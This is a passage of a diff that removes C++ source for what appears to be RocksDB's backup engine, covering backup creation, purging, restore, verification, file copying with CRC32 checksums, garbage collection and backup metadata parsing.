-  ROCKS_LOG_INFO(options_.info_log,
-                 "Started the backup process -- creating backup %u",
-                 new_backup_id);
-
-  auto private_tmp_dir = GetAbsolutePath(GetPrivateFileRel(new_backup_id, true));
-  Status s = backup_env_->FileExists(private_tmp_dir);
-  if (s.ok()) {
-    // maybe last backup failed and left partial state behind, clean it up
-    s = GarbageCollect();
-  } else if (s.IsNotFound()) {
-    // normal case, the new backup's private dir doesn't exist yet
-    s = Status::OK();
-  }
-  if (s.ok()) {
-    s = backup_env_->CreateDir(private_tmp_dir);
-  }
-
-  RateLimiter* rate_limiter = options_.backup_rate_limiter.get();
-  if (rate_limiter) {
-    copy_file_buffer_size_ = rate_limiter->GetSingleBurstBytes();
-  }
-
-  // A set into which we will insert the dst_paths that are calculated for live
-  // files and live WAL files.
-  // This is used to check whether a live files shares a dst_path with another
-  // live file.
-  std::unordered_set<std::string> live_dst_paths;
-
-  std::vector<BackupAfterCopyOrCreateWorkItem> backup_items_to_finish;
-  // Add a CopyOrCreateWorkItem to the channel for each live file
-  db->DisableFileDeletions();
-  if (s.ok()) {
-    CheckpointImpl checkpoint(db);
-    uint64_t sequence_number = 0;
-    s = checkpoint.CreateCustomCheckpoint(
-        db->GetDBOptions(),
-        [&](const std::string& src_dirname, const std::string& fname,
-            FileType) {
-          // custom checkpoint will switch to calling copy_file_cb after it sees
-          // NotSupported returned from link_file_cb.
-          return Status::NotSupported();
-        } /* link_file_cb */,
-        [&](const std::string& src_dirname, const std::string& fname,
-            uint64_t size_limit_bytes, FileType type) {
-          if (type == kLogFile && !options_.backup_log_files) {
-            return Status::OK();
-          }
-          Log(options_.info_log, "add file for backup %s", fname.c_str());
-          uint64_t size_bytes = 0;
-          Status st;
-          if (type == kTableFile) {
-            st = db_env_->GetFileSize(src_dirname + fname, &size_bytes);
-          }
-          if (st.ok()) {
-            st = AddBackupFileWorkItem(
-                live_dst_paths, backup_items_to_finish, new_backup_id,
-                options_.share_table_files && type == kTableFile, src_dirname,
-                fname, rate_limiter, size_bytes, size_limit_bytes,
-                options_.share_files_with_checksum && type == kTableFile,
-                progress_callback);
-          }
-          return st;
-        } /* copy_file_cb */,
-        [&](const std::string& fname, const std::string& contents, FileType) {
-          Log(options_.info_log, "add file for backup %s", fname.c_str());
-          return AddBackupFileWorkItem(
-              live_dst_paths, backup_items_to_finish, new_backup_id,
-              false /* shared */, "" /* src_dir */, fname, rate_limiter,
-              contents.size(), 0 /* size_limit */, false /* shared_checksum */,
-              progress_callback, contents);
-        } /* create_file_cb */,
-        &sequence_number, flush_before_backup ? 0 : port::kMaxUint64);
-    if (s.ok()) {
-      new_backup->SetSequenceNumber(sequence_number);
-    }
-  }
-  ROCKS_LOG_INFO(options_.info_log, "add files for backup done, wait finish.");
-  Status item_status;
-  for (auto& item : backup_items_to_finish) {
-    item.result.wait();
-    auto result = item.result.get();
-    item_status = result.status;
-    if (item_status.ok() && item.shared && item.needed_to_copy) {
-      item_status = item.backup_env->RenameFile(item.dst_path_tmp,
-                                                item.dst_path);
-    }
-    if (item_status.ok()) {
-      item_status = new_backup.get()->AddFile(
-              std::make_shared<FileInfo>(item.dst_relative,
-                                         result.size,
-                                         result.checksum_value));
-    }
-    if (!item_status.ok()) {
-      s = item_status;
-    }
-  }
-
-  // we copied all the files, enable file deletions
-  db->EnableFileDeletions(false);
-
-  if (s.ok()) {
-    // move tmp private backup to real backup folder
-    ROCKS_LOG_INFO(
-        options_.info_log,
-        "Moving tmp backup directory to the real one: %s -> %s\n",
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, true)).c_str(),
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)).c_str());
-    s = backup_env_->RenameFile(
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, true)),  // tmp
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)));
-  }
-
-  auto backup_time = backup_env_->NowMicros() - start_backup;
-
-  if (s.ok()) {
-    // persist the backup metadata on the disk
-    s = new_backup->StoreToFile(options_.sync);
-  }
-  if (s.ok() && options_.sync) {
-    unique_ptr<Directory> backup_private_directory;
-    backup_env_->NewDirectory(
-        GetAbsolutePath(GetPrivateFileRel(new_backup_id, false)),
-        &backup_private_directory);
-    if (backup_private_directory != nullptr) {
-      backup_private_directory->Fsync();
-    }
-    if (private_directory_ != nullptr) {
-      private_directory_->Fsync();
-    }
-    if (meta_directory_ != nullptr) {
-      meta_directory_->Fsync();
-    }
-    if (shared_directory_ != nullptr) {
-      shared_directory_->Fsync();
-    }
-    if (backup_directory_ != nullptr) {
-      backup_directory_->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    backup_statistics_.IncrementNumberSuccessBackup();
-  }
-  if (!s.ok()) {
-    backup_statistics_.IncrementNumberFailBackup();
-    // clean all the files we might have created
-    ROCKS_LOG_INFO(options_.info_log, "Backup failed -- %s",
-                   s.ToString().c_str());
-    ROCKS_LOG_INFO(options_.info_log, "Backup Statistics %s\n",
-                   backup_statistics_.ToString().c_str());
-    // delete files that we might have already written
-    DeleteBackup(new_backup_id);
-    GarbageCollect();
-    return s;
-  }
-
-  // here we know that we succeeded and installed the new backup
-  // in the LATEST_BACKUP file
-  latest_backup_id_ = new_backup_id;
-  ROCKS_LOG_INFO(options_.info_log, "Backup DONE. All is good");
-
-  // backup_speed is in byte/second
-  double backup_speed = new_backup->GetSize() / (1.048576 * backup_time);
-  ROCKS_LOG_INFO(options_.info_log, "Backup number of files: %u",
-                 new_backup->GetNumberFiles());
-  char human_size[16];
-  AppendHumanBytes(new_backup->GetSize(), human_size, sizeof(human_size));
-  ROCKS_LOG_INFO(options_.info_log, "Backup size: %s", human_size);
-  ROCKS_LOG_INFO(options_.info_log, "Backup time: %" PRIu64 " microseconds",
-                 backup_time);
-  ROCKS_LOG_INFO(options_.info_log, "Backup speed: %.3f MB/s", backup_speed);
-  ROCKS_LOG_INFO(options_.info_log, "Backup Statistics %s",
-                 backup_statistics_.ToString().c_str());
-  return s;
-}
-
-Status BackupEngineImpl::PurgeOldBackups(uint32_t num_backups_to_keep) {
-  assert(initialized_);
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Purging old backups, keeping %u",
-                 num_backups_to_keep);
-  std::vector<BackupID> to_delete;
-  auto itr = backups_.begin();
-  while ((backups_.size() - to_delete.size()) > num_backups_to_keep) {
-    to_delete.push_back(itr->first);
-    itr++;
-  }
-  for (auto backup_id : to_delete) {
-    auto s = DeleteBackup(backup_id);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-Status BackupEngineImpl::DeleteBackup(BackupID backup_id) {
-  assert(initialized_);
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Deleting backup %u", backup_id);
-  auto backup = backups_.find(backup_id);
-  if (backup != backups_.end()) {
-    auto s = backup->second->Delete();
-    if (!s.ok()) {
-      return s;
-    }
-    backups_.erase(backup);
-  } else {
-    auto corrupt = corrupt_backups_.find(backup_id);
-    if (corrupt == corrupt_backups_.end()) {
-      return Status::NotFound("Backup not found");
-    }
-    auto s = corrupt->second.second->Delete();
-    if (!s.ok()) {
-      return s;
-    }
-    corrupt_backups_.erase(corrupt);
-  }
-
-  std::vector<std::string> to_delete;
-  for (auto& itr : backuped_file_infos_) {
-    if (itr.second->refs == 0) {
-      Status s = backup_env_->DeleteFile(GetAbsolutePath(itr.first));
-      ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s", itr.first.c_str(),
-                     s.ToString().c_str());
-      to_delete.push_back(itr.first);
-    }
-  }
-  for (auto& td : to_delete) {
-    backuped_file_infos_.erase(td);
-  }
-
-  // take care of private dirs -- GarbageCollect() will take care of them
-  // if they are not empty
-  std::string private_dir = GetPrivateFileRel(backup_id);
-  Status s = backup_env_->DeleteDir(GetAbsolutePath(private_dir));
-  ROCKS_LOG_INFO(options_.info_log, "Deleting private dir %s -- %s",
-                 private_dir.c_str(), s.ToString().c_str());
-  return Status::OK();
-}
-
-void BackupEngineImpl::GetBackupInfo(std::vector<BackupInfo>* backup_info) {
-  assert(initialized_);
-  backup_info->reserve(backups_.size());
-  for (auto& backup : backups_) {
-    if (!backup.second->Empty()) {
-      backup_info->push_back(BackupInfo(
-          backup.first, backup.second->GetTimestamp(), backup.second->GetSize(),
-          backup.second->GetNumberFiles(), backup.second->GetAppMetadata()));
-    }
-  }
-}
-
-void
-BackupEngineImpl::GetCorruptedBackups(
-    std::vector<BackupID>* corrupt_backup_ids) {
-  assert(initialized_);
-  corrupt_backup_ids->reserve(corrupt_backups_.size());
-  for (auto& backup : corrupt_backups_) {
-    corrupt_backup_ids->push_back(backup.first);
-  }
-}
-
-Status BackupEngineImpl::RestoreDBFromBackup(
-    BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-    const RestoreOptions& restore_options) {
-  assert(initialized_);
-  auto corrupt_itr = corrupt_backups_.find(backup_id);
-  if (corrupt_itr != corrupt_backups_.end()) {
-    return corrupt_itr->second.first;
-  }
-  auto backup_itr = backups_.find(backup_id);
-  if (backup_itr == backups_.end()) {
-    return Status::NotFound("Backup not found");
-  }
-  auto& backup = backup_itr->second;
-  if (backup->Empty()) {
-    return Status::NotFound("Backup not found");
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Restoring backup id %u\n", backup_id);
-  ROCKS_LOG_INFO(options_.info_log, "keep_log_files: %d\n",
-                 static_cast<int>(restore_options.keep_log_files));
-
-  // just in case. Ignore errors
-  db_env_->CreateDirIfMissing(db_dir);
-  db_env_->CreateDirIfMissing(wal_dir);
-
-  if (restore_options.keep_log_files) {
-    // delete files in db_dir, but keep all the log files
-    DeleteChildren(db_dir, 1 << kLogFile);
-    // move all the files from archive dir to wal_dir
-    std::string archive_dir = ArchivalDirectory(wal_dir);
-    std::vector<std::string> archive_files;
-    db_env_->GetChildren(archive_dir, &archive_files);  // ignore errors
-    for (const auto& f : archive_files) {
-      uint64_t number;
-      FileType type;
-      bool ok = ParseFileName(f, &number, &type);
-      if (ok && type == kLogFile) {
-        ROCKS_LOG_INFO(options_.info_log,
-                       "Moving log file from archive/ to wal_dir: %s",
-                       f.c_str());
-        Status s =
-            db_env_->RenameFile(archive_dir + "/" + f, wal_dir + "/" + f);
-        if (!s.ok()) {
-          // if we can't move log file from archive_dir to wal_dir,
-          // we should fail, since it might mean data loss
-          return s;
-        }
-      }
-    }
-  } else {
-    DeleteChildren(wal_dir);
-    DeleteChildren(ArchivalDirectory(wal_dir));
-    DeleteChildren(db_dir);
-  }
-
-  RateLimiter* rate_limiter = options_.restore_rate_limiter.get();
-  if (rate_limiter) {
-    copy_file_buffer_size_ = rate_limiter->GetSingleBurstBytes();
-  }
-  Status s;
-  std::vector<RestoreAfterCopyOrCreateWorkItem> restore_items_to_finish;
-  for (const auto& file_info : backup->GetFiles()) {
-    const std::string &file = file_info->filename;
-    std::string dst;
-    // 1. extract the filename
-    size_t slash = file.find_last_of('/');
-    // file will either be shared/<file>, shared_checksum/<file_crc32_size>
-    // or private/<number>/<file>
-    assert(slash != std::string::npos);
-    dst = file.substr(slash + 1);
-
-    // if the file was in shared_checksum, extract the real file name
-    // in this case the file is <number>_<checksum>_<size>.<type>
-    if (file.substr(0, slash) == GetSharedChecksumDirRel()) {
-      dst = GetFileFromChecksumFile(dst);
-    }
-
-    // 2. find the filetype
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(dst, &number, &type);
-    if (!ok) {
-      return Status::Corruption("Backup corrupted");
-    }
-    // 3. Construct the final path
-    // kLogFile lives in wal_dir and all the rest live in db_dir
-    dst = ((type == kLogFile) ? wal_dir : db_dir) +
-      "/" + dst;
-
-    ROCKS_LOG_INFO(options_.info_log, "Restoring %s to %s\n", file.c_str(),
-                   dst.c_str());
-    CopyOrCreateWorkItem copy_or_create_work_item(
-        GetAbsolutePath(file), dst, "" /* contents */, backup_env_, db_env_,
-        false, rate_limiter, 0 /* size_limit */);
-    RestoreAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        copy_or_create_work_item.result.get_future(),
-        file_info->checksum_value);
-    files_to_copy_or_create_.write(std::move(copy_or_create_work_item));
-    restore_items_to_finish.push_back(
-        std::move(after_copy_or_create_work_item));
-  }
-  Status item_status;
-  for (auto& item : restore_items_to_finish) {
-    item.result.wait();
-    auto result = item.result.get();
-    item_status = result.status;
-    // Note: It is possible that both of the following bad-status cases occur
-    // during copying. But, we only return one status.
-    if (!item_status.ok()) {
-      s = item_status;
-      break;
-    } else if (item.checksum_value != result.checksum_value) {
-      s = Status::Corruption("Checksum check failed");
-      break;
-    }
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Restoring done -- %s\n",
-                 s.ToString().c_str());
-  return s;
-}
-
-Status BackupEngineImpl::VerifyBackup(BackupID backup_id) {
-  assert(initialized_);
-  auto corrupt_itr = corrupt_backups_.find(backup_id);
-  if (corrupt_itr != corrupt_backups_.end()) {
-    return corrupt_itr->second.first;
-  }
-
-  auto backup_itr = backups_.find(backup_id);
-  if (backup_itr == backups_.end()) {
-    return Status::NotFound();
-  }
-
-  auto& backup = backup_itr->second;
-  if (backup->Empty()) {
-    return Status::NotFound();
-  }
-
-  ROCKS_LOG_INFO(options_.info_log, "Verifying backup id %u\n", backup_id);
-
-  std::unordered_map<std::string, uint64_t> curr_abs_path_to_size;
-  for (const auto& rel_dir : {GetPrivateFileRel(backup_id), GetSharedFileRel(),
-                              GetSharedFileWithChecksumRel()}) {
-    const auto abs_dir = GetAbsolutePath(rel_dir);
-    InsertPathnameToSizeBytes(abs_dir, backup_env_, &curr_abs_path_to_size);
-  }
-
-  for (const auto& file_info : backup->GetFiles()) {
-    const auto abs_path = GetAbsolutePath(file_info->filename);
-    if (curr_abs_path_to_size.find(abs_path) == curr_abs_path_to_size.end()) {
-      return Status::NotFound("File missing: " + abs_path);
-    }
-    if (file_info->size != curr_abs_path_to_size[abs_path]) {
-      return Status::Corruption("File corrupted: " + abs_path);
-    }
-  }
-  return Status::OK();
-}
-
-Status BackupEngineImpl::CopyOrCreateFile(
-    const std::string& src, const std::string& dst, const std::string& contents,
-    Env* src_env, Env* dst_env, bool sync, RateLimiter* rate_limiter,
-    uint64_t* size, uint32_t* checksum_value, uint64_t size_limit,
-    std::function<void()> progress_callback) {
-  assert(src.empty() != contents.empty());
-  Status s;
-  unique_ptr<WritableFile> dst_file;
-  unique_ptr<SequentialFile> src_file;
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  // TODO:(gzh) maybe use direct reads/writes here if possible
-  if (size != nullptr) {
-    *size = 0;
-  }
-  if (checksum_value != nullptr) {
-    *checksum_value = 0;
-  }
-
-  // Check if size limit is set. if not, set it to very big number
-  if (size_limit == 0) {
-    size_limit = std::numeric_limits<uint64_t>::max();
-  }
-
-  s = dst_env->NewWritableFile(dst, &dst_file, env_options);
-  if (s.ok() && !src.empty()) {
-    s = src_env->NewSequentialFile(src, &src_file, env_options);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<WritableFileWriter> dest_writer(
-      new WritableFileWriter(std::move(dst_file), env_options));
-  unique_ptr<SequentialFileReader> src_reader;
-  unique_ptr<char[]> buf;
-  if (!src.empty()) {
-    src_reader.reset(new SequentialFileReader(std::move(src_file)));
-    buf.reset(new char[copy_file_buffer_size_]);
-  }
-
-  Slice data;
-  uint64_t processed_buffer_size = 0;
-  do {
-    if (stop_backup_.load(std::memory_order_acquire)) {
-      return Status::Incomplete("Backup stopped");
-    }
-    if (!src.empty()) {
-      size_t buffer_to_read = (copy_file_buffer_size_ < size_limit)
-                                  ? copy_file_buffer_size_
-                                  : size_limit;
-      s = src_reader->Read(buffer_to_read, &data, buf.get());
-      processed_buffer_size += buffer_to_read;
-    } else {
-      data = contents;
-    }
-    size_limit -= data.size();
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    if (size != nullptr) {
-      *size += data.size();
-    }
-    if (checksum_value != nullptr) {
-      *checksum_value =
-          crc32c::Extend(*checksum_value, data.data(), data.size());
-    }
-    s = dest_writer->Append(data);
-    if (rate_limiter != nullptr) {
-      rate_limiter->Request(data.size(), Env::IO_LOW, nullptr /* stats */,
-                            RateLimiter::OpType::kWrite);
-    }
-    if (processed_buffer_size > options_.callback_trigger_interval_size) {
-      processed_buffer_size -= options_.callback_trigger_interval_size;
-      std::lock_guard<std::mutex> lock(byte_report_mutex_);
-      progress_callback();
-    }
-  } while (s.ok() && contents.empty() && data.size() > 0 && size_limit > 0);
-
-  if (s.ok() && sync) {
-    s = dest_writer->Sync(false);
-  }
-  if (s.ok()) {
-    s = dest_writer->Close();
-  }
-  return s;
-}
-
-// fname will always start with "/"
-Status BackupEngineImpl::AddBackupFileWorkItem(
-    std::unordered_set<std::string>& live_dst_paths,
-    std::vector<BackupAfterCopyOrCreateWorkItem>& backup_items_to_finish,
-    BackupID backup_id, bool shared, const std::string& src_dir,
-    const std::string& fname, RateLimiter* rate_limiter, uint64_t size_bytes,
-    uint64_t size_limit, bool shared_checksum,
-    std::function<void()> progress_callback, const std::string& contents) {
-  assert(!fname.empty() && fname[0] == '/');
-  assert(contents.empty() != src_dir.empty());
-
-  std::string dst_relative = fname.substr(1);
-  std::string dst_relative_tmp;
-  Status s;
-  uint32_t checksum_value = 0;
-
-  if (shared && shared_checksum) {
-    // add checksum and file length to the file name
-    s = CalculateChecksum(src_dir + fname, db_env_, size_limit,
-                          &checksum_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (size_bytes == port::kMaxUint64) {
-      return Status::NotFound("File missing: " + src_dir + fname);
-    }
-    dst_relative =
-        GetSharedFileWithChecksum(dst_relative, checksum_value, size_bytes);
-    dst_relative_tmp = GetSharedFileWithChecksumRel(dst_relative, true);
-    dst_relative = GetSharedFileWithChecksumRel(dst_relative, false);
-  } else if (shared) {
-    dst_relative_tmp = GetSharedFileRel(dst_relative, true);
-    dst_relative = GetSharedFileRel(dst_relative, false);
-  } else {
-    dst_relative_tmp = GetPrivateFileRel(backup_id, true, dst_relative);
-    dst_relative = GetPrivateFileRel(backup_id, false, dst_relative);
-  }
-  std::string dst_path = GetAbsolutePath(dst_relative);
-  std::string dst_path_tmp = GetAbsolutePath(dst_relative_tmp);
-
-  // if it's shared, we also need to check if it exists -- if it does, no need
-  // to copy it again.
-  bool need_to_copy = true;
-  // true if dst_path is the same path as another live file
-  const bool same_path =
-      live_dst_paths.find(dst_path) != live_dst_paths.end();
-
-  bool file_exists = false;
-  if (shared && !same_path) {
-    Status exist = backup_env_->FileExists(dst_path);
-    if (exist.ok()) {
-      file_exists = true;
-    } else if (exist.IsNotFound()) {
-      file_exists = false;
-    } else {
-      assert(s.IsIOError());
-      return exist;
-    }
-  }
-
-  if (!contents.empty()) {
-    need_to_copy = false;
-  } else if (shared && (same_path || file_exists)) {
-    need_to_copy = false;
-    if (shared_checksum) {
-      ROCKS_LOG_INFO(options_.info_log,
-                     "%s already present, with checksum %u and size %" PRIu64,
-                     fname.c_str(), checksum_value, size_bytes);
-    } else if (backuped_file_infos_.find(dst_relative) ==
-               backuped_file_infos_.end() && !same_path) {
-      // file already exists, but it's not referenced by any backup. overwrite
-      // the file
-      ROCKS_LOG_INFO(
-          options_.info_log,
-          "%s already present, but not referenced by any backup. We will "
-          "overwrite the file.",
-          fname.c_str());
-      need_to_copy = true;
-      backup_env_->DeleteFile(dst_path);
-    } else {
-      // the file is present and referenced by a backup
-      ROCKS_LOG_INFO(options_.info_log,
-                     "%s already present, calculate checksum", fname.c_str());
-      s = CalculateChecksum(src_dir + fname, db_env_, size_limit,
-                            &checksum_value);
-    }
-  }
-  live_dst_paths.insert(dst_path);
-
-  if (!contents.empty() || need_to_copy) {
-    ROCKS_LOG_INFO(options_.info_log, "Copying %s to %s", fname.c_str(),
-                   dst_path_tmp.c_str());
-    CopyOrCreateWorkItem copy_or_create_work_item(
-        src_dir.empty() ? "" : src_dir + fname, dst_path_tmp, contents, db_env_,
-        backup_env_, options_.sync, rate_limiter, size_limit,
-        progress_callback);
-    BackupAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        copy_or_create_work_item.result.get_future(), shared, need_to_copy,
-        backup_env_, dst_path_tmp, dst_path, dst_relative);
-    files_to_copy_or_create_.write(std::move(copy_or_create_work_item));
-    backup_items_to_finish.push_back(std::move(after_copy_or_create_work_item));
-  } else {
-    std::promise<CopyOrCreateResult> promise_result;
-    BackupAfterCopyOrCreateWorkItem after_copy_or_create_work_item(
-        promise_result.get_future(), shared, need_to_copy, backup_env_,
-        dst_path_tmp, dst_path, dst_relative);
-    backup_items_to_finish.push_back(std::move(after_copy_or_create_work_item));
-    CopyOrCreateResult result;
-    result.status = s;
-    result.size = size_bytes;
-    result.checksum_value = checksum_value;
-    promise_result.set_value(std::move(result));
-  }
-  return s;
-}
-
-Status BackupEngineImpl::CalculateChecksum(const std::string& src, Env* src_env,
-                                           uint64_t size_limit,
-                                           uint32_t* checksum_value) {
-  *checksum_value = 0;
-  if (size_limit == 0) {
-    size_limit = std::numeric_limits<uint64_t>::max();
-  }
-
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_reads = false;
-
-  std::unique_ptr<SequentialFile> src_file;
-  Status s = src_env->NewSequentialFile(src, &src_file, env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<SequentialFileReader> src_reader(
-      new SequentialFileReader(std::move(src_file)));
-  std::unique_ptr<char[]> buf(new char[copy_file_buffer_size_]);
-  Slice data;
-
-  do {
-    if (stop_backup_.load(std::memory_order_acquire)) {
-      return Status::Incomplete("Backup stopped");
-    }
-    size_t buffer_to_read = (copy_file_buffer_size_ < size_limit) ?
-      copy_file_buffer_size_ : size_limit;
-    s = src_reader->Read(buffer_to_read, &data, buf.get());
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    size_limit -= data.size();
-    *checksum_value = crc32c::Extend(*checksum_value, data.data(), data.size());
-  } while (data.size() > 0 && size_limit > 0);
-
-  return s;
-}
-
-void BackupEngineImpl::DeleteChildren(const std::string& dir,
-                                      uint32_t file_type_filter) {
-  std::vector<std::string> children;
-  db_env_->GetChildren(dir, &children);  // ignore errors
-
-  for (const auto& f : children) {
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(f, &number, &type);
-    if (ok && (file_type_filter & (1 << type))) {
-      // don't delete this file
-      continue;
-    }
-    db_env_->DeleteFile(dir + "/" + f);  // ignore errors
-  }
-}
-
-Status BackupEngineImpl::InsertPathnameToSizeBytes(
-    const std::string& dir, Env* env,
-    std::unordered_map<std::string, uint64_t>* result) {
-  assert(result != nullptr);
-  std::vector<Env::FileAttributes> files_attrs;
-  Status status = env->FileExists(dir);
-  if (status.ok()) {
-    status = env->GetChildrenFileAttributes(dir, &files_attrs);
-  } else if (status.IsNotFound()) {
-    // Insert no entries can be considered success
-    status = Status::OK();
-  }
-  const bool slash_needed = dir.empty() || dir.back() != '/';
-  for (const auto& file_attrs : files_attrs) {
-    result->emplace(dir + (slash_needed ? "/" : "") + file_attrs.name,
-                    file_attrs.size_bytes);
-  }
-  return status;
-}
-
-Status BackupEngineImpl::GarbageCollect() {
-  assert(!read_only_);
-  ROCKS_LOG_INFO(options_.info_log, "Starting garbage collection");
-
-  if (options_.share_table_files) {
-    // delete obsolete shared files
-    std::vector<std::string> shared_children;
-    {
-      std::string shared_path;
-      if (options_.share_files_with_checksum) {
-        shared_path = GetAbsolutePath(GetSharedFileWithChecksumRel());
-      } else {
-        shared_path = GetAbsolutePath(GetSharedFileRel());
-      }
-      auto s = backup_env_->FileExists(shared_path);
-      if (s.ok()) {
-        s = backup_env_->GetChildren(shared_path, &shared_children);
-      } else if (s.IsNotFound()) {
-        s = Status::OK();
-      }
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    for (auto& child : shared_children) {
-      std::string rel_fname;
-      if (options_.share_files_with_checksum) {
-        rel_fname = GetSharedFileWithChecksumRel(child);
-      } else {
-        rel_fname = GetSharedFileRel(child);
-      }
-      auto child_itr = backuped_file_infos_.find(rel_fname);
-      // if it's not refcounted, delete it
-      if (child_itr == backuped_file_infos_.end() ||
-          child_itr->second->refs == 0) {
-        // this might be a directory, but DeleteFile will just fail in that
-        // case, so we're good
-        Status s = backup_env_->DeleteFile(GetAbsolutePath(rel_fname));
-        ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s",
-                       rel_fname.c_str(), s.ToString().c_str());
-        backuped_file_infos_.erase(rel_fname);
-      }
-    }
-  }
-
-  // delete obsolete private files
-  std::vector<std::string> private_children;
-  {
-    auto s = backup_env_->GetChildren(GetAbsolutePath(GetPrivateDirRel()),
-                                      &private_children);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  for (auto& child : private_children) {
-    BackupID backup_id = 0;
-    bool tmp_dir = child.find(".tmp") != std::string::npos;
-    sscanf(child.c_str(), "%u", &backup_id);
-    if (!tmp_dir &&  // if it's tmp_dir, delete it
-        (backup_id == 0 || backups_.find(backup_id) != backups_.end())) {
-      // it's either not a number or it's still alive. continue
-      continue;
-    }
-    // here we have to delete the dir and all its children
-    std::string full_private_path =
-        GetAbsolutePath(GetPrivateFileRel(backup_id, tmp_dir));
-    std::vector<std::string> subchildren;
-    backup_env_->GetChildren(full_private_path, &subchildren);
-    for (auto& subchild : subchildren) {
-      Status s = backup_env_->DeleteFile(full_private_path + subchild);
-      ROCKS_LOG_INFO(options_.info_log, "Deleting %s -- %s",
-                     (full_private_path + subchild).c_str(),
-                     s.ToString().c_str());
-    }
-    // finally delete the private dir
-    Status s = backup_env_->DeleteDir(full_private_path);
-    ROCKS_LOG_INFO(options_.info_log, "Deleting dir %s -- %s",
-                   full_private_path.c_str(), s.ToString().c_str());
-  }
-
-  return Status::OK();
-}
-
-// ------- BackupMeta class --------
-
-Status BackupEngineImpl::BackupMeta::AddFile(
-    std::shared_ptr<FileInfo> file_info) {
-  auto itr = file_infos_->find(file_info->filename);
-  if (itr == file_infos_->end()) {
-    auto ret = file_infos_->insert({file_info->filename, file_info});
-    if (ret.second) {
-      itr = ret.first;
-      itr->second->refs = 1;
-    } else {
-      // if this happens, something is seriously wrong
-      return Status::Corruption("In memory metadata insertion error");
-    }
-  } else {
-    if (itr->second->checksum_value != file_info->checksum_value) {
-      return Status::Corruption(
-          "Checksum mismatch for existing backup file. Delete old backups and "
-          "try again.");
-    }
-    ++itr->second->refs;  // increase refcount if already present
-  }
-
-  size_ += file_info->size;
-  files_.push_back(itr->second);
-
-  return Status::OK();
-}
-
-Status BackupEngineImpl::BackupMeta::Delete(bool delete_meta) {
-  Status s;
-  for (const auto& file : files_) {
-    --file->refs;  // decrease refcount
-  }
-  files_.clear();
-  // delete meta file
-  if (delete_meta) {
-    s = env_->FileExists(meta_filename_);
-    if (s.ok()) {
-      s = env_->DeleteFile(meta_filename_);
-    } else if (s.IsNotFound()) {
-      s = Status::OK();  // nothing to delete
-    }
-  }
-  timestamp_ = 0;
-  return s;
-}
-
-Slice kMetaDataPrefix("metadata ");
-
-// each backup meta file is of the format:
-// <timestamp>
-// <seq number>
-// <metadata(literal string)> <metadata> (optional)
-// <number of files>
-// <file1> <crc32(literal string)> <crc32_value>
-// <file2> <crc32(literal string)> <crc32_value>
-// ...
-Status BackupEngineImpl::BackupMeta::LoadFromFile(
-    const std::string& backup_dir,
-    const std::unordered_map<std::string, uint64_t>& abs_path_to_size) {
-  assert(Empty());
-  Status s;
-  unique_ptr<SequentialFile> backup_meta_file;
-  s = env_->NewSequentialFile(meta_filename_, &backup_meta_file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<SequentialFileReader> backup_meta_reader(
-      new SequentialFileReader(std::move(backup_meta_file)));
-  unique_ptr<char[]> buf(new char[max_backup_meta_file_size_ + 1]);
-  Slice data;
-  s = backup_meta_reader->Read(max_backup_meta_file_size_, &data, buf.get());
-
-  if (!s.ok() || data.size() == max_backup_meta_file_size_) {
-    return s.ok() ? Status::Corruption("File size too big") : s;
-  }
-  buf[data.size()] = 0;
-
-  uint32_t num_files = 0;
-  char *next;
-  timestamp_ = strtoull(data.data(), &next, 10);
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-  sequence_number_ = strtoull(data.data(), &next, 10);
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-
-  if (data.starts_with(kMetaDataPrefix)) {
-    // app metadata present
-    data.remove_prefix(kMetaDataPrefix.size());
-    Slice hex_encoded_metadata = GetSliceUntil(&data, '\n');
-    bool decode_success = hex_encoded_metadata.DecodeHex(&app_metadata_);
-    if (!decode_success) {
-      return Status::Corruption(
-          "Failed to decode stored hex encoded app metadata");
-    }
-  }
-
-  num_files = static_cast<uint32_t>(strtoul(data.data(), &next, 10));
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-
-  std::vector<std::shared_ptr<FileInfo>> files;
-
-  Slice checksum_prefix("crc32 ");
-
-  for (uint32_t i = 0; s.ok() && i < num_files; ++i) {
-    auto line = GetSliceUntil(&data, '\n');
-    std::string filename = GetSliceUntil(&line, ' ').ToString();
-
-    uint64_t size;
-    const std::shared_ptr<FileInfo> file_info = GetFile(filename);
-    if (file_info) {
-      size = file_info->size;
-    } else {
-      std::string abs_path = backup_dir + "/" + filename;
-      try {
-        size = abs_path_to_size.at(abs_path);
-      } catch (std::out_of_range&) {
-        return Status::Corruption("Size missing for pathname: " + abs_path);
-      }
-    }
-
-    if (line.empty()) {
-      return Status::Corruption("File checksum is missing for " + filename +
-                                " in " + meta_filename_);
-    }
-
-    uint32_t checksum_value = 0;
-    if (line.starts_with(checksum_prefix)) {
-      line.remove_prefix(checksum_prefix.size());
-      checksum_value = static_cast<uint32_t>(
